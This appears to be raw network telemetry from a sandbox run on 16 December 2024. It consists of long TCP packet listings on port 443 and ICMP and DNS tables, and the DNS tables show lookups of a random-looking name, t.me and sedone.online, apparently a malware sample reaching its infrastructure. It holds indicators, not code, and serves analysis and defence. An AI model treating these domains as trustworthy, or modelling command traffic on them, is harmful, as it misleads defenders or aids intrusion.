                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.036432028 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.041904926 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.297813892 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:35.357661009 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.125107050 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.126097918 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131025076 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131062984 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131098032 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131215096 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131520033 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131557941 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.131591082 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.132325888 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.132376909 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.132411957 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.132919073 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.142345905 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.142388105 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.142600060 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.175132990 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.209709883 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.392529964 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.525002003 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.532674074 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.532718897 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.532849073 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.532885075 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.532988071 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.533065081 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.533118010 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.533154964 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.533190966 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.533225060 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.534043074 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.534080982 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.534115076 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.534156084 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.534473896 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.534970999 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.535008907 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.535043955 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.535079956 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.535109043 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.582967043 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.607361078 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.872812986 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.922278881 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927133083 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927210093 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927427053 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927463055 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927504063 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927516937 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927930117 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.927962065 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:36.939518929 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.254530907 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.259428978 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.259470940 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.259736061 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.259876966 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.259888887 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.259897947 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.260298014 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.288723946 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.422403097 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.634360075 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.743575096 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.756669998 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.756984949 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.757989883 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.758105993 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.758117914 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.758621931 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.758632898 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.758642912 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.759327888 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.759341002 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.759351015 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.760149002 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.760159969 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.760169983 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.760180950 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.760190010 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.760338068 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:37.785845995 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:38.099142075 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:46.183823109 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:46.498577118 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.888653994 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.888668060 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.888758898 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.888955116 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:52.896121025 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.210901976 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.217187881 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.217211008 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.217391968 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.369638920 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.489789009 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.512649059 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.726835966 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.726882935 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.727135897 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.827578068 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.828006983 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.833173037 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.833241940 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.833276987 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.833612919 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.833673000 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:53.848447084 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.163125992 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.168092012 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.168114901 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.168350935 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.168431044 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.176764011 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.491844893 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.498207092 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.498264074 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.498363972 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.498590946 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.505024910 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.822441101 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.850147009 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.850188017 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.850301027 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.850646019 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:54.856715918 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.173460007 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.177712917 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.177747965 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.177983999 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.177984953 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.184003115 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.499433994 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.504193068 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.504235029 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.504496098 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.504503965 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.510989904 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.825653076 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.830267906 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.830301046 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.830336094 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:55.831271887 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.149600983 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.162694931 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.191346884 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.316605091 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.317089081 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.477807045 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.478336096 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.483632088 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.483669996 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.483705997 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.483988047 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.484236002 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.507103920 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.821953058 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.827172995 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.827186108 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.827245951 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.828757048 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:56.840723991 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.161609888 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.188741922 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.190224886 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.190287113 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.190432072 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.190664053 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.196701050 CET53450443192.168.2.823.200.88.31
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.527626038 CET4435345023.200.88.31192.168.2.8
                                                                                                                                                                                                                                                                Dec 16, 2024 13:47:57.537278891 CET4435345023.200.88.31192.168.2.8
| Timestamp | Source IP | Dest IP | Checksum | Code | Type |
|---|---|---|---|---|---|
| Dec 16, 2024 13:47:15.371722937 CET | 192.168.2.8 | 1.1.1.1 | c24e | (Port unreachable) | Destination Unreachable |
| Dec 16, 2024 13:47:17.431565046 CET | 192.168.2.8 | 1.1.1.1 | c29f | (Port unreachable) | Destination Unreachable |
| Dec 16, 2024 13:47:19.453927994 CET | 192.168.2.8 | 1.1.1.1 | c2bd | (Port unreachable) | Destination Unreachable |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 16, 2024 13:45:59.716845036 CET | 192.168.2.8 | 1.1.1.1 | 0xdc4 | Standard query (0) | IuwKjpytGYqQ.IuwKjpytGYqQ | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:46:37.994612932 CET | 192.168.2.8 | 1.1.1.1 | 0x7771 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:46:40.086894989 CET | 192.168.2.8 | 1.1.1.1 | 0xb2c2 | Standard query (0) | sedone.online | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:46:55.733422041 CET | 192.168.2.8 | 1.1.1.1 | 0x2d7f | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:46:55.733752012 CET | 192.168.2.8 | 1.1.1.1 | 0x29f1 | Standard query (0) | www.google.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:11.208626032 CET | 192.168.2.8 | 1.1.1.1 | 0x689f | Standard query (0) | ntp.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:11.210082054 CET | 192.168.2.8 | 1.1.1.1 | 0xf708 | Standard query (0) | ntp.msn.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:14.130533934 CET | 192.168.2.8 | 1.1.1.1 | 0x5063 | Standard query (0) | bzib.nelreports.net | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:14.134114981 CET | 192.168.2.8 | 1.1.1.1 | 0x9332 | Standard query (0) | bzib.nelreports.net | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.123812914 CET | 192.168.2.8 | 1.1.1.1 | 0x71b1 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.123862028 CET | 192.168.2.8 | 1.1.1.1 | 0xfde7 | Standard query (0) | clients2.googleusercontent.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.703663111 CET | 192.168.2.8 | 1.1.1.1 | 0x5322 | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.703860044 CET | 192.168.2.8 | 1.1.1.1 | 0x8f06 | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.704943895 CET | 192.168.2.8 | 1.1.1.1 | 0xb02c | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.705298901 CET | 192.168.2.8 | 1.1.1.1 | 0x68fb | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.778506994 CET | 192.168.2.8 | 1.1.1.1 | 0xe10b | Standard query (0) | chrome.cloudflare-dns.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:15.778997898 CET | 192.168.2.8 | 1.1.1.1 | 0x6a3e | Standard query (0) | chrome.cloudflare-dns.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:19.472141027 CET | 192.168.2.8 | 1.1.1.1 | 0x2a69 | Standard query (0) | sb.scorecardresearch.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:19.472729921 CET | 192.168.2.8 | 1.1.1.1 | 0x718e | Standard query (0) | sb.scorecardresearch.com | 65 | IN (0x0001) | false |
| Dec 16, 2024 13:47:19.473676920 CET | 192.168.2.8 | 1.1.1.1 | 0x8387 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false |
| Dec 16, 2024 13:47:19.474136114 CET | 192.168.2.8 | 1.1.1.1 | 0xbf5b | Standard query (0) | assets.msn.com | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 13:45:59.946110010 CET | 1.1.1.1 | 192.168.2.8 | 0xdc4 | Name error (3) | IuwKjpytGYqQ.IuwKjpytGYqQ | none | none | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:46:38.131934881 CET | 1.1.1.1 | 192.168.2.8 | 0x7771 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:46:40.402167082 CET | 1.1.1.1 | 192.168.2.8 | 0xb2c2 | No error (0) | sedone.online | | 116.203.12.114 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:46:55.870940924 CET | 1.1.1.1 | 192.168.2.8 | 0x29f1 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Dec 16, 2024 13:46:55.877623081 CET | 1.1.1.1 | 192.168.2.8 | 0x2d7f | No error (0) | www.google.com | | 142.250.181.68 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:11.347549915 CET | 1.1.1.1 | 192.168.2.8 | 0x689f | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:11.349066019 CET | 1.1.1.1 | 192.168.2.8 | 0xf708 | No error (0) | ntp.msn.com | www-msn-com.a-0003.a-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:11.646861076 CET | 1.1.1.1 | 192.168.2.8 | 0x5647 | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:11.825052023 CET | 1.1.1.1 | 192.168.2.8 | 0x609a | No error (0) | bingadsedgeextension-prod-europe.azurewebsites.net | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:11.825052023 CET | 1.1.1.1 | 192.168.2.8 | 0x609a | No error (0) | ssl.bingadsedgeextension-prod-europe.azurewebsites.net | | 94.245.104.56 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:14.276228905 CET | 1.1.1.1 | 192.168.2.8 | 0x9332 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:14.361715078 CET | 1.1.1.1 | 192.168.2.8 | 0x5063 | No error (0) | bzib.nelreports.net | bzib.nelreports.net.akamaized.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:15.267926931 CET | 1.1.1.1 | 192.168.2.8 | 0x71b1 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:15.267926931 CET | 1.1.1.1 | 192.168.2.8 | 0x71b1 | No error (0) | googlehosted.l.googleusercontent.com | | 172.217.19.225 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.371644020 CET | 1.1.1.1 | 192.168.2.8 | 0xfde7 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:15.841986895 CET | 1.1.1.1 | 192.168.2.8 | 0x5322 | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.841986895 CET | 1.1.1.1 | 192.168.2.8 | 0x5322 | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.842006922 CET | 1.1.1.1 | 192.168.2.8 | 0xb02c | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.842006922 CET | 1.1.1.1 | 192.168.2.8 | 0xb02c | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.842021942 CET | 1.1.1.1 | 192.168.2.8 | 0x8f06 | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 16, 2024 13:47:15.846132040 CET | 1.1.1.1 | 192.168.2.8 | 0x68fb | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 16, 2024 13:47:15.917495012 CET | 1.1.1.1 | 192.168.2.8 | 0xe10b | No error (0) | chrome.cloudflare-dns.com | | 172.64.41.3 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.917495012 CET | 1.1.1.1 | 192.168.2.8 | 0xe10b | No error (0) | chrome.cloudflare-dns.com | | 162.159.61.3 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:15.922132015 CET | 1.1.1.1 | 192.168.2.8 | 0x6a3e | No error (0) | chrome.cloudflare-dns.com | | | 65 | IN (0x0001) | false
Dec 16, 2024 13:47:19.282402992 CET | 1.1.1.1 | 192.168.2.8 | 0x8dae | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 16, 2024 13:47:19.282402992 CET | 1.1.1.1 | 192.168.2.8 | 0x8dae | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:19.610693932 CET | 1.1.1.1 | 192.168.2.8 | 0x2a69 | No error (0) | sb.scorecardresearch.com | | 18.165.220.57 | A (IP address) | IN (0x0001) | false
Dec 16, 2024 13:47:19.610693932 CET | 1.1.1.1 | 192.168.2.8 | 0x2a69 | No error (0) | sb.scorecardresearch.com | | 18.165.220.110 | A (IP address) | IN (0x0001) | false
